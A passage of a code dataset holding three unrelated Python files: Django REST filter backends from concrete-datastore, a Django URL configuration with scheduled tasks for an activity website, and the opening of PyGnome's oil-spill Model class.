ValueError if not UUID4\n if not ensure_uuid_valid(value, version=4):\n message = f'{bare_param}: « {value} » is not a valid UUID'\n raise ValidationError({\"message\": message})\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterForeignKeyIsNullBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__isnull',\n 'required': False,\n 'in': 'query',\n 'schema': {'type': 'boolean'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n in ('ForeignKey', 'ManyToManyField')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object = None\n for param in query_params:\n if not param.endswith('__isnull'):\n continue\n if query_params.get(param) not in ['true', 'false']:\n continue\n field_name = param.replace('__isnull', '')\n if field_name not in filterset_fields:\n continue\n param_value = True if query_params.get(param) == 'true' else False\n cleaned_param_type = get_filter_field_type(\n queryset.model, field_name\n )\n if cleaned_param_type in ('ForeignKey', 'ManyToManyField'):\n custom_filter = {param: param_value}\n else:\n continue\n\n if q_object is None:\n q_object = Q(**custom_filter)\n else:\n q_object &= Q(**custom_filter)\n if q_object is None:\n return queryset\n\n return queryset.filter(q_object)\n\n\nclass FilterSupportingManyToMany(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__in{neg}',\n 'required': False,\n 'description': 'List of uids separated by comma',\n 'in': 'query',\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n == 'ManyToManyField'\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n q_object_filter = None\n q_object_exclude = None\n\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n if not bare_param.endswith('__in'):\n continue\n field_name = bare_param.replace('__in', '')\n if field_name not in filterset_fields:\n continue\n cleaned_param_type = get_filter_field_type(\n queryset.model, field_name\n )\n if not cleaned_param_type == 'ManyToManyField':\n continue\n values = set(query_params.get(param).split(','))\n\n #: \"value\" must be a valid UUID4, otherwise raise ValidationError\n for value in values:\n if not ensure_uuid_valid(value, version=4):\n #: raises ValueError if not UUID4\n message = f'{bare_param}: « {value} » is not a valid UUID'\n raise ValidationError({\"message\": message})\n\n custom_filter = {bare_param: values}\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n ).distinct()\n","repo_name":"Netsach/concrete-datastore","sub_path":"concrete_datastore/api/v1/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":41102,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"37052485615","text":"from django.conf.urls import url\nfrom . import views\nfrom . import auth_views\nfrom . import user_views\nfrom . import admin_views\nfrom . import activity_views\nfrom . import msg_views\nfrom apscheduler.scheduler import Scheduler\nfrom activity_management.views import update_ready_activities,email_remind\n\n\nsched = Scheduler()\n\n\n@sched.interval_schedule(seconds=300)\ndef tasks():\n update_ready_activities()\n\n@sched.cron_schedule(hour=8, minute=1)\ndef email_examine():\n email_remind()\n\nsched.start()\n\n\n\nurlpatterns = [\n\n # img\n url(r'^upload_image$', views.upload_image, name='upload_image'),\n # home page\n url(r'^$', views.home_page, name='home'),\n\n # sign up\n url(r'^sign_up$', auth_views.sign_up, name='sign_up'),\n url(r'^sign_up/submit$', auth_views.sign_up_submit, name='sign_up_submit'),\n\n # log\n url(r'^log_in$', auth_views.log_in, name='log_in'),\n url(r'^log_in/submit$', auth_views.log_in_submit, name='log_in_submit'),\n url(r'^log_out$', auth_views.log_out, name='log_out'),\n\n # auth\n url(r'^authenticate$', auth_views.authenticate, name='authenticate'),\n url(r'^authenticate/submit$', auth_views.authenticate_submit, name='authenticate_submit'),\n\n # info\n url(r'change_info$', user_views.change_info, name='change_info'),\n url(r'change_info/submit$', user_views.change_info_submit, name='change_info_submit'),\n url(r'show_user_info/([1-9][0-9]*)$', user_views.show_user_info, name='show_user_info'),\n\n\n #activity\n url(r'apply_activity$',activity_views.apply_activity,name = 'apply_activity'),\n url(r'show_activity/([1-9][0-9]*)$',activity_views.show_activity,name = 'show_activity'),\n url(r'join_activity/([1-9][0-9]*)$', activity_views.join_activity,name='join_activity'),\n url(r'quit_activity/([1-9][0-9]*)$',activity_views.quit_activity,name = 'quit_activity'),\n url(r'join_activity_list/([1-9][0-9]*)$',activity_views.join_actvity_list,name = 'join_activity_list'),\n url(r'cancel_activity_join/([1-9][0-9]*)$',activity_views.cancel_activity_join,name = 'cancel_activity_join'),\n url(r'clear_activity_join/([1-9][0-9]*)$',activity_views.clear_activity_join,name = 'clear_activity_join'),\n url(r'change_activity_info/([1-9][0-9]*)$',activity_views.change_activity_info,name = 'change_activity_info'),\n url(r'cancel_activity/([1-9][0-9]*)$',activity_views.cancel_activity,name = 'cancel_activity'),\n url(r'resume_activity/([1-9][0-9]*)$',activity_views.resume_activity,name = 'resume_activity'),\n #url(r'user_info$', user_views.user_info, name='user_info'),\n url(r'^multi_apply_submit$', views.multi_apply_submit, name='multi_apply_submit'),\n url(r'show_search_activities$', activity_views.show_search_activities, name='show_search_activities'),\n\n url(r'show_user_applied_activities/([1-9][0-9]*)$',activity_views.show_user_applied_activities,name = 'show_user_applied_activities'),\n url(r'show_user_joined_activities$',activity_views.show_user_joined_activities,name = 'show_user_joined_activities'),\n\n #admin\n url(r'admin_home$', admin_views.admin_home, name='admin_home'),\n url(r'ban_activity/([1-9][0-9]*)$',admin_views.ban_activity,name = 'ban_activity'),\n url(r'lift_activity/([1-9][0-9]*)$',admin_views.lift_activity,name = 'lift_activity'),\n url(r'^show_activity_info/admin/([1-9][0-9]*)$', admin_views.admin_show_activity, name='admin_show_activity'),\n url(r'^show_user_info/admin/([1-9][0-9]*)$', admin_views.admin_user_info, name='admin_user_info'),\n url(r'^upgrade_user/admin/([1-9][0-9]*)$', admin_views.upgrade_user, name='upgrade_user'),\n url(r'^degrade_user/admin/([1-9][0-9]*)$', admin_views.degrade_user, name='degrade_user'),\n url(r'^enter_admin$', admin_views.enter_admin, name='enter_admin'),\n url(r'^raise_priority/admin/([1-9][0-9]*)$', admin_views.admin_raise_priority, name='admin_raise_priority'),\n\n #msg\n url(r'send_message$',msg_views.send_message,name = 'send_message'),\n url(r'unread_message$',msg_views.unread_message,name = 'unread_message'),\n url(r'delete_message/([1-9][0-9]*)$',msg_views.delete_message,name = 'delete_message'),\n url(r'delete_all_messages$',msg_views.delete_all_messages,name = 'delete_all_messages'),\n url(r'set_read/([1-9][0-9]*)$',msg_views.set_read,name = 'set_read'),\n url(r'set_all_read$',msg_views.set_all_read,name = 'set_all_read'),\n url(r'reply_message/([1-9][0-9]*)$',msg_views.reply_message,name = 'reply_message'),\n url(r'send_to_Ta/([1-9][0-9]*)$',msg_views.send_to_Ta,name = 'send_to_Ta'),\n]","repo_name":"AlexsaseXie/ActivityWebsite","sub_path":"activity_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8020795117","text":"#!/usr/bin/env python\n\n\"\"\"\nmodule with the core Model class, and various supporting classes\n\nThis is the main class that contains objects used to model trajectory and\nweathering processes. It runs the loop through time, etc.\nThe code comes with a full-featured version -- you may want a simpler one if\nyou aren't doing a full-on oil spill model. The model contains:\n\n* map\n* collection of environment objects\n* collection of movers\n* collection of weatherers\n* spills\n* its own attributes\n\nIn pseudo code, the model loop is defined below. In the first step, it sets up the\nmodel run and in subsequent steps the model moves and weathers elements.\n\n.. code-block:: python\n\n for each_timestep():\n if initial_timestep:\n setup_model_run()\n setup_time_step()\n move_the_elements()\n beach_refloat_the_elements()\n weather_the_elements()\n write_output()\n step_is_done()\n step_num += 1\n\n\"\"\"\n\nimport os\nfrom datetime import datetime, timedelta\nimport zipfile\nfrom pprint import pformat\nimport copy\nimport warnings\n\nimport numpy as np\n\nfrom colander import (SchemaNode,\n String, Float, Int, Bool, List,\n drop, OneOf)\n\nfrom gnome.utilities.time_utils import round_time, asdatetime\nimport gnome.utilities.rand\nfrom gnome.utilities.cache import ElementCache\nfrom gnome.utilities.orderedcollection import OrderedCollection\nfrom gnome.spill_container import SpillContainerPair\nfrom gnome.basic_types import oil_status, fate\n\nfrom gnome.maps.map import (GnomeMapSchema,\n MapFromBNASchema,\n ParamMapSchema,\n MapFromUGridSchema,\n GnomeMap)\n\nfrom gnome.environment import Environment, Wind\nfrom gnome.environment.water import Water\nfrom gnome.array_types import gat\nfrom gnome.environment import schemas as env_schemas\n\nfrom gnome.movers import Mover, mover_schemas\nfrom gnome.weatherers import (weatherer_sort,\n Weatherer,\n FayGravityViscous,\n Langmuir,\n weatherer_schemas,\n weatherers_by_name,\n standard_weatherering_sets,\n )\nfrom gnome.outputters import Outputter, NetCDFOutput, WeatheringOutput\nfrom gnome.outputters import schemas as out_schemas\nfrom gnome.persist import (extend_colander,\n validators,\n References)\nfrom gnome.persist.base_schema import (ObjTypeSchema,\n CollectionItemsList,\n GeneralGnomeObjectSchema)\nfrom gnome.exceptions import ReferencedObjectNotSet, GnomeRuntimeError\nfrom gnome.spills.spill import SpillSchema\nfrom gnome.gnomeobject import GnomeId, allowzip64, Refs\nfrom gnome.persist.extend_colander import OrderedCollectionSchema\nfrom gnome.spills.substance import NonWeatheringSubstance\n\nfrom gnome.ops import aggregated_data, weathering_array_types, non_weathering_array_types\nfrom gnome.ops.viscosity import recalc_viscosity\nfrom gnome.ops.density import recalc_density\n\n\nclass ModelSchema(ObjTypeSchema):\n 'Colander schema for Model object'\n time_step = SchemaNode(Float())\n weathering_substeps = SchemaNode(Int())\n start_time = SchemaNode(\n extend_colander.LocalDateTime(),\n validator=validators.convertible_to_seconds\n )\n duration = SchemaNode(\n extend_colander.TimeDelta()\n )\n uncertain = SchemaNode(Bool())\n cache_enabled = SchemaNode(Bool())\n num_time_steps = SchemaNode(Int(), read_only=True)\n make_default_refs = SchemaNode(Bool())\n mode = SchemaNode(\n String(), validator=OneOf(['gnome', 'adios', 'roc'])\n )\n location = SchemaNode(\n List(), missing=drop,\n\n )\n # fixme: this feels fragile -- couldn't we use subclassing?\n # any Schema derived from GnomeMapSchema would be good?\n map = GeneralGnomeObjectSchema(\n acceptable_schemas=(GnomeMapSchema,\n MapFromBNASchema,\n ParamMapSchema,\n MapFromUGridSchema),\n save_reference=True\n )\n environment = OrderedCollectionSchema(\n GeneralGnomeObjectSchema(acceptable_schemas=env_schemas),\n save_reference=True\n )\n spills = OrderedCollectionSchema(\n GeneralGnomeObjectSchema(acceptable_schemas=[SpillSchema]),\n save_reference=True, test_equal=False\n )\n# uncertain_spills = OrderedCollectionSchema(\n# GeneralGnomeObjectSchema(acceptable_schemas=[SpillSchema]),\n# save_reference=True, test_equal=False\n# )\n movers = OrderedCollectionSchema(\n GeneralGnomeObjectSchema(acceptable_schemas=mover_schemas),\n save_reference=True\n )\n weatherers = OrderedCollectionSchema(\n GeneralGnomeObjectSchema(acceptable_schemas=weatherer_schemas),\n save_reference=True\n )\n outputters = OrderedCollectionSchema(\n GeneralGnomeObjectSchema(acceptable_schemas=out_schemas),\n save_reference=True\n )\n\n #UI Configuration properties for web client:\n #manual_weathering = SchemaNode(Bool(), save=False, update=True, test_equal=False, missing=drop)\n weathering_activated = SchemaNode(Bool(), save=True, update=True, test_equal=False, missing=drop)\n\n\nclass Model(GnomeId):\n '''\n PyGnome Model Class\n '''\n _schema = ModelSchema\n\n # list of OrderedCollections\n _oc_list = ['movers', 'weatherers', 'environment', 'outputters']\n\n modes = {'gnome', 'adios', 'roc'}\n\n @classmethod\n def load_savefile(cls, filename):\n \"\"\"\n Load a model instance from a save file\n\n :param filename: the filename of the save file -- usually a zip file,\n but can also be a directry with the full contents of\n a zip file\n\n :return: a model instance all set up from the savefile.\n \"\"\"\n model = cls.load(filename)\n\n # check that this actually loaded a model object\n # load() will load any gnome object from json...\n if not isinstance(model, cls):\n raise ValueError('This does not appear to be a save file '\n 'for a model\\n'\n 'loaded a {} instead'\n .format(type(model)))\n else:\n return model\n\n def __init__(self,\n name='Model',\n time_step=timedelta(minutes=15),\n start_time=round_time(datetime.now(), 3600),\n duration=timedelta(days=1),\n weathering_substeps=1,\n map=None,\n uncertain=False,\n cache_enabled=False,\n mode=None,\n make_default_refs=True,\n location=[],\n environment=[],\n outputters=[],\n movers=[],\n weatherers=[],\n spills=[],\n uncertain_spills=[],\n #manual_weathering=False,\n weathering_activated=False,\n **kwargs):\n '''\n Initializes a model.\n All arguments have a default.\n\n :param time_step=timedelta(minutes=15): model time step in seconds\n or as a timedelta object. NOTE:\n if you pass in a number, it WILL\n be interpreted as seconds\n\n :param start_time=datetime.now(): start time of model, datetime\n object. Rounded to the nearest hour.\n\n :param duration=timedelta(days=1): How long to run the model,\n a timedelta object.\n\n :param weathering_substeps=1: How many weathering substeps to\n run inside a single model time step.\n\n :param map=gnome.map.GnomeMap(): The land-water map.\n\n :param uncertain=False: Flag for setting uncertainty.\n\n :param cache_enabled=False: Flag for setting whether the model should\n cache results to disk.\n\n :param mode='Gnome': The runtime 'mode' that the model should use.\n This is a value that the Web Client uses to\n decide which UI views it should present.\n '''\n # making sure basic stuff is in place before properties are set\n super(Model, self).__init__(name=name, **kwargs)\n self.environment = OrderedCollection(dtype=Environment)\n self.movers = OrderedCollection(dtype=Mover)\n self.weatherers = OrderedCollection(dtype=Weatherer)\n self.outputters = OrderedCollection(dtype=Outputter)\n\n self.environment.add(environment)\n self.movers.add(movers)\n self.weatherers.add(weatherers)\n self.outputters.add(outputters)\n\n # contains both certain/uncertain spills\n self.spills = SpillContainerPair(uncertain)\n if len(uncertain_spills) > 0:\n _spills = list(zip(spills, uncertain_spills))\n else:\n _spills = spills\n self.spills.add(_spills)\n\n self._cache = ElementCache()\n self._cache.enabled = cache_enabled\n\n # default to now, rounded to the nearest hour\n self.start_time = start_time\n self._duration = duration\n self.weathering_substeps = weathering_substeps\n\n if not map:\n map = GnomeMap()\n self._map = map\n\n if mode is not None:\n if mode in Model.modes:\n self.mode = mode\n else:\n raise ValueError('Model mode ({}) invalid, '\n 'should be one of {{{}}}'\n .format(mode, ', '.join(Model.modes)))\n else:\n self.mode = 'gnome'\n\n # reset _current_time_step\n self._current_time_step = -1\n self._time_step = None\n if time_step is not None:\n self.time_step = time_step # this calls rewind() !\n self._reset_num_time_steps()\n\n # default is to zip save file\n self.zipsave = True\n\n # model creates references to weatherers/environment if\n # make_default_refs is True\n self.make_default_refs = True\n\n self.location = location\n self._register_callbacks()\n #self.manual_weathering = manual_weathering\n self.weathering_activated = weathering_activated\n self.array_types.update({'age': gat('age')})\n\n def _register_callbacks(self):\n\n '''\n Register callbacks with the OrderedCollections\n '''\n self.movers.register_callback(self._callback_add_mover,\n ('add', 'replace'))\n self.weatherers.register_callback(self._callback_add_weatherer_env,\n ('add', 'replace'))\n self.environment.register_callback(self._callback_add_weatherer_env,\n ('add', 'replace'))\n self.outputters.register_callback(self._callback_add_outputter,\n ('add', 'replace'))\n\n self.movers.register_callback(self._callback_add_spill,\n ('add', 'replace', 'remove'))\n\n def add_weathering(self, which='standard'):\n \"\"\"\n Add the weatherers\n\n :param which='standard': which weatheres to add. Default is 'standard',\n which will add all the standard weathering algorithms\n if you don't want them all, you can specify a list:\n ['evaporation', 'dispersion'].\n\n Options are:\n - 'evaporation'\n - 'dispersion'\n - 'emulsification'\n - 'dissolution': Dissolution,\n - 'half_life_weatherer'\n\n see: ``gnome.weatherers.__init__.py`` for the full list\n\n \"\"\"\n # names = list(weatherers_by_name.keys())\n try:\n which = standard_weatherering_sets[which]\n except (TypeError, KeyError):\n # assume it's a list passed in.\n pass\n for wx_name in which:\n try:\n self.weatherers += weatherers_by_name[wx_name.lower()]()\n except KeyError:\n raise ValueError(\"{} is not a valid weatherer. \\n\"\n \"The options are:\"\n \" {}\".format(wx_name,\n list(weatherers_by_name.keys())))\n\n\n\n\n\n def reset(self, **kwargs):\n '''\n Resets model to defaults -- Caution -- clears all movers, spills, etc.\n Takes same keyword arguments as :meth:`__init__()`\n '''\n self.__init__(**kwargs)\n\n def rewind(self):\n '''\n Rewinds the model to the beginning (start_time)\n '''\n self._current_time_step = -1\n self.model_time = self.start_time\n\n # fixme: do the movers need re-setting? -- or wait for\n # prepare_for_model_run?\n\n # note: This may be redundant. They will get reset in\n # setup_model_run() anyway..\n self.spills.rewind()\n\n # set rand before each call so windages are set correctly\n gnome.utilities.rand.seed(1)\n\n # clear the cache:\n self._cache.rewind()\n\n for outputter in self.outputters:\n outputter.rewind()\n\n #self.logger.info(self._pid + \"rewound model - \" + self.name)\n\n# def write_from_cache(self, filetype='netcdf', time_step='all'):\n# \"\"\"\n# write the already-cached data to an output files.\n# \"\"\"\n\n def update_from_dict(self, dict_, refs=None):\n \"\"\"\n functions in common_object.\n \"\"\"\n if refs is None:\n refs = Refs()\n self._schema.register_refs(self._schema(), self, refs)\n updatable = self._schema().get_nodes_by_attr('update')\n\n updated = False\n attrs = {k: v for k, v in dict_.items() if k in updatable}\n # all the below in one comprehension :-)\n # attrs = copy.copy(dict_)\n # for k in list(attrs.keys()):\n # if k not in updatable:\n # attrs.pop(k)\n\n for name in updatable:\n node = self._schema().get(name)\n if name in attrs:\n if name != 'spills':\n attrs[name] = self._schema.process_subnode(node,self,getattr(self,name),name,attrs,attrs[name],refs)\n if attrs[name] is drop:\n del attrs[name]\n else:\n oldspills = OrderedCollection(self.spills\n ._spill_container.spills[:],\n dtype=(self.spills.\n _spill_container\n .spills.dtype))\n new_spills = ObjTypeSchema.process_subnode(node, self,\n self.spills\n ._spill_container\n .spills,\n 'spills',\n attrs,\n attrs[name],\n refs)\n if not updated and self._attr_changed(oldspills,\n new_spills):\n updated = True\n\n attrs.pop(name)\n\n #attrs may be out of order. However, we want to process the data in schema order (held in 'updatable')\n for k in updatable:\n if hasattr(self, k) and k in attrs:\n if not updated and self._attr_changed(getattr(self, k), attrs[k]):\n updated = True\n\n try:\n setattr(self, k, attrs[k])\n except AttributeError:\n self.logger.error('Failed to set {} on {} to {}'\n .format(k, self, v))\n raise\n attrs.pop(k)\n\n #process all remaining items in any order...can't wait to see where problems pop up in here\n for k, v in list(attrs.items()):\n if hasattr(self, k):\n if not updated and self._attr_changed(getattr(self, k), v):\n updated = True\n\n try:\n setattr(self, k, v)\n except AttributeError:\n self.logger.error('Failed to set {} on {} to {}'\n .format(k, self, v))\n raise\n\n return updated\n\n @property\n def uncertain(self):\n '''\n Uncertainty attribute of the model. If flag is toggled, rewind model\n '''\n return self.spills.uncertain\n\n @uncertain.setter\n def uncertain(self, uncertain_value):\n '''\n Uncertainty attribute of the model\n '''\n if self.spills.uncertain != uncertain_value:\n self.spills.uncertain = uncertain_value # update uncertainty\n self.rewind()\n\n @property\n def uncertain_spills(self):\n return self.spills.to_dict().get('uncertain_spills', [])\n\n @property\n def cache_enabled(self):\n '''\n If True, then generated data is cached\n '''\n return self._cache.enabled\n\n @cache_enabled.setter\n def cache_enabled(self, enabled):\n self._cache.enabled = enabled\n\n @property\n def has_weathering_uncertainty(self):\n return (any([w.on for w in self.weatherers]) and\n len([o for o in self.outputters\n if isinstance(o, WeatheringOutput)]) > 0 and\n (any([s.amount_uncertainty_scale > 0.0\n for s in self.spills]) or\n any([w.speed_uncertainty_scale > 0.0\n for w in self.environment\n if isinstance(w, Wind)])))\n\n @property\n def start_time(self):\n '''\n Start time of the simulation\n '''\n return self._start_time\n\n @start_time.setter\n def start_time(self, start_time):\n self._start_time = asdatetime(start_time)\n self.rewind()\n\n @property\n def time_step(self):\n '''\n time step over which the dynamics is computed\n '''\n return self._time_step\n\n @time_step.setter\n def time_step(self, time_step):\n '''\n Sets the time step, and rewinds the model\n\n :param time_step: The timestep can be a timedelta object\n or integer seconds.\n '''\n try:\n self._time_step = time_step.total_seconds()\n except AttributeError:\n self._time_step = int(time_step)\n\n self._reset_num_time_steps()\n self.rewind()\n\n @property\n def current_time_step(self):\n '''\n Current timestep of the simulation\n '''\n return self._current_time_step\n\n @current_time_step.setter\n def current_time_step(self, step):\n self.model_time = (self.start_time +\n timedelta(seconds=step * self.time_step))\n self._current_time_step = step\n\n @property\n def duration(self):\n '''\n total duration of the model run\n '''\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n if duration < self._duration:\n # only need to rewind if shorter than it was...\n # fixme: actually, only need to rewind if current model time\n # is beyond new time...\n self.rewind()\n self._duration = duration\n self._reset_num_time_steps()\n\n @property\n def map(self):\n '''\n land water map used for simulation\n '''\n return self._map\n\n @map.setter\n def map(self, map_in):\n self._map = map_in\n self.rewind()\n\n @property\n def num_time_steps(self):\n '''\n Read only attribute\n computed number of timesteps based on py:attribute:`duration` and\n py:attribute:`time_step`\n '''\n return self._num_time_steps\n\n def _reset_num_time_steps(self):\n '''\n reset number of time steps if duration, or time_step change\n '''\n # We do not count any remainder time.\n if self.duration is not None and self.time_step is not None:\n initial_0th_step = 1\n self._num_time_steps = (initial_0th_step +\n int(self.duration.total_seconds() //\n self.time_step))\n else:\n self._num_time_steps = None\n\n def contains_object(self, obj_id):\n if self.map.id == obj_id:\n return True\n\n for collection in (self.environment,\n self.spills,\n self.movers,\n self.weatherers,\n self.outputters):\n for o in collection:\n if obj_id == o.id:\n return True\n\n if (hasattr(o, 'contains_object') and\n o.contains_object(obj_id)):\n return True\n\n return False\n\n def find_by_class(self, obj, collection, ret_all=False):\n '''\n Look for an object that isinstance() of obj in specified colleciton.\n By default, it will return the first object of this type.\n To get all obects of this type, set ret_all to True\n '''\n all_objs = []\n for item in collection:\n if isinstance(item, obj):\n if not ret_all:\n #return obj\n return item\n else:\n #all_objs.append(obj)\n all_objs.append(item)\n\n if len(all_objs) == 0:\n return None\n\n return all_objs\n\n def find_by_attr(self, attr, value, collection, allitems=False):\n # fixme: shouldn't this functionality be in OrderedCollection?\n # better yet, have a different way to find things!\n '''\n find first object in collection where the 'attr' attribute matches\n 'value'. This is primarily used to find 'wind', 'water', 'waves'\n objects in environment collection. Use the '_ref_as' attribute to\n search.\n\n # fixme: why don't we look for wind, water or waves directly?\n\n Ignore AttributeError since all objects in collection may not contain\n the attribute over which we are searching.\n\n :param attr: attribute whose value must match\n :type attr: str\n\n :param value: desired value of the attribute\n :type value: str\n\n :param OrderedCollection collection: the ordered collection in which\n to search\n '''\n items = []\n for item in collection:\n try:\n if not isinstance(getattr(item, attr), str):\n if any([value == v for v in getattr(item, attr)]):\n if allitems:\n items.append(item)\n else:\n return item\n else:\n if getattr(item, attr) == value:\n if allitems:\n items.append(item)\n else:\n return item\n except AttributeError:\n pass\n\n return None if items == [] else items\n\n def _order_weatherers(self):\n 'use weatherer_sort to sort the weatherers'\n s_weatherers = sorted(self.weatherers, key=weatherer_sort)\n\n if list(self.weatherers.values()) != s_weatherers:\n self.weatherers.clear()\n self.weatherers += s_weatherers\n\n def _attach_default_refs(self, ref_dict):\n '''\n Model invokes the default reference attachment system. Please note the\n structure of this function as an example of how to extend the system\n to contained child objects.\n '''\n #Begin by attaching references to self. Model doesn't need any special\n #behavior, so just call super. If special behavior is necessary beyond\n #simply going for the first-in-line, it is defined here.\n super(Model, self)._attach_default_refs(ref_dict)\n\n # gathering references IS OPTIONAL. If you are expecting relevant refs\n # to have already been collected by a parent, this may be skipped.\n # Since Model is top-level, it should gather what it can\n self.gather_ref_as(self.environment, ref_dict)\n self.gather_ref_as(self.map, ref_dict)\n self.gather_ref_as(self.movers, ref_dict)\n self.gather_ref_as(self.weatherers, ref_dict)\n self.gather_ref_as(self.outputters, ref_dict)\n\n # Provide the references to all contained objects that also use the\n # default references system by calling _attach_default_refs on each\n # instance\n all_spills = [sp for sc in self.spills.items() for sp in sc.spills.values()]\n for coll in [self.environment,\n self.weatherers,\n self.movers,\n self.outputters,\n all_spills]:\n for item in coll:\n item._attach_default_refs(ref_dict)\n\n\n def setup_model_run(self):\n '''\n Runs the setup procedure preceding a model run. When complete, the\n model should be ready to run to completion without additional prep\n Currently this function consists of the following operations:\n\n 1. Set up special objects.\n Some weatherers currently require other weatherers to exist. This\n step satisfies those requirements\n 2. Remake collections in case ordering constraints apply (weatherers)\n 3. Compile array_types and run setup procedure on spills\n array_types defines what data arrays are required by the various\n components of the model\n 4. Attach default references\n 5. Call prepare_for_model_run on all relevant objects\n 6. Conduct miscellaneous prep items. See section in code for details.\n '''\n\n '''Step 1: Set up special objects'''\n weather_data = dict()\n\n spread = None\n langmuir = None\n for item in self.weatherers:\n if item.on:\n weather_data.update(item.array_types)\n\n try:\n if item._ref_as == 'spreading':\n item.on = False\n spread = item\n if item._ref_as == 'langmuir':\n item.on = False\n langmuir = item\n except AttributeError:\n pass\n\n# if a weatherer is using 'area' array, make sure it is being set.\n # Objects that set 'area' are referenced as 'spreading'\n if 'area' in weather_data:\n if spread is None:\n self.weatherers += FayGravityViscous()\n else:\n # turn spreading back on\n spread.on = True\n\n if langmuir is None:\n self.weatherers += Langmuir()\n else:\n # turn langmuir back on\n langmuir.on = True\n\n '''Step 2: Remake and reorganize collections'''\n for oc in [self.movers, self.weatherers,\n self.outputters, self.environment]:\n oc.remake()\n self._order_weatherers()\n\n '''Step 3: Compile array_types and run setup on spills'''\n array_types = dict()\n #setup basic array types. non_weathering is subset of weathering\n array_types.update(non_weathering_array_types)\n for sp in self.spills:\n if sp.substance and sp.substance.is_weatherable:\n array_types.update(weathering_array_types)\n #Go through all subcomponents to see what array types they need\n for oc in [self.movers,\n self.outputters,\n self.environment,\n self.weatherers,\n self.spills]:\n for item in oc:\n if (hasattr(item, 'array_types')):\n array_types.update(item.all_array_types)\n\n #self.logger.debug(array_types)\n\n for sc in self.spills.items():\n sc.prepare_for_model_run(array_types, self.time_step)\n\n '''Step 4: Attach default references'''\n ref_dict = {}\n self._attach_default_refs(ref_dict)\n\n '''Step 5: Setup mass balance'''\n for sc in self.spills.items():\n for key in ('avg_density', 'floating', 'amount_released', 'non_weathering',\n 'avg_viscosity'):\n sc.mass_balance[key] = 0.0\n\n '''Step 6: Call prepare_for_model_run and misc setup'''\n transport = False\n for mover in self.movers:\n if mover.on:\n mover.prepare_for_model_run()\n transport = True\n\n weathering = False\n for w in self.weatherers:\n for sc in self.spills.items():\n # weatherers will initialize 'mass_balance' key/values\n # to 0.0\n if w.on:\n w.prepare_for_model_run(sc)\n weathering = True\n\n for environment in self.environment:\n environment.prepare_for_model_run(self.start_time)\n\n if self.time_step is None:\n # for now hard-code this; however, it should depend on weathering\n # note: do not set time_step attribute because we don't want to\n # rewind because that will reset spill_container data\n if transport:\n self._time_step = 900\n elif weathering and not transport:\n # todo: 1 hour\n self._time_step = 3600\n else:\n # simple case with no weatherers or movers\n self._time_step = 900\n self._reset_num_time_steps()\n\n # outputters need array_types, so this needs to come after those\n # have been updated.\n for outputter in self.outputters:\n outputter.prepare_for_model_run(model_start_time=self.start_time,\n cache=self._cache,\n uncertain=self.uncertain,\n spills=self.spills,\n model_time_step=self.time_step)\n self.logger.debug(\"{0._pid} setup_model_run complete for: \"\n \"{0.name}\".format(self))\n\n def post_model_run(self):\n '''\n A place where the model goes through all collections and calls\n post_model_run if the object has it.\n '''\n for env in self.environment:\n env.post_model_run()\n for mov in self.movers:\n if mov.on:\n mov.post_model_run()\n for out in self.outputters:\n if out.on:\n out.post_model_run()\n for wea in self.weatherers:\n if wea.on:\n wea.post_model_run()\n\n def setup_time_step(self):\n '''\n sets up everything for the current time_step:\n '''\n # initialize movers differently if model uncertainty is on\n for m in self.movers:\n for sc in self.spills.items():\n m.prepare_for_model_step(sc, self.time_step, self.model_time)\n\n for w in self.weatherers:\n for sc in self.spills.items():\n # maybe we will setup a super-sampling step here???\n w.prepare_for_model_step(sc, self.time_step, self.model_time)\n\n for environment in self.environment:\n environment.prepare_for_model_step(self.model_time)\n\n for outputter in self.outputters:\n outputter.prepare_for_model_step(self.time_step, self.model_time)\n\n def move_elements(self):\n '''\n Moves elements:\n - loops through all the movers. and moves the elements\n - sets new_position array for each spill\n - calls the beaching code to beach the elements that need beaching.\n - sets the new position\n '''\n for sc in self.spills.items():\n if sc.num_released > 0: # can this check be removed?\n # possibly refloat elements\n self.map.refloat_elements(sc, self.time_step, self.model_time)\n\n # reset next_positions\n (sc['next_positions'])[:] = sc['positions']\n\n # loop through the movers\n for m in self.movers:\n delta = m.get_move(sc, self.time_step, self.model_time)\n sc['next_positions'] += delta\n\n self.map.beach_elements(sc, self.model_time)\n\n # let model mark these particles to be removed\n tbr_mask = sc['status_codes'] == oil_status.off_maps\n sc['status_codes'][tbr_mask] = oil_status.to_be_removed\n\n substances = sc.get_substances(False)\n if len(substances) > 0:\n self._update_fate_status(sc)\n\n # the final move to the new positions\n (sc['positions'])[:] = sc['next_positions']\n\n def _update_fate_status(self, sc):\n '''\n WeatheringData used to perform this operation in weather_elements;\n however, WeatheringData is one of the objects in weatherers collection\n so just let model do this for now. 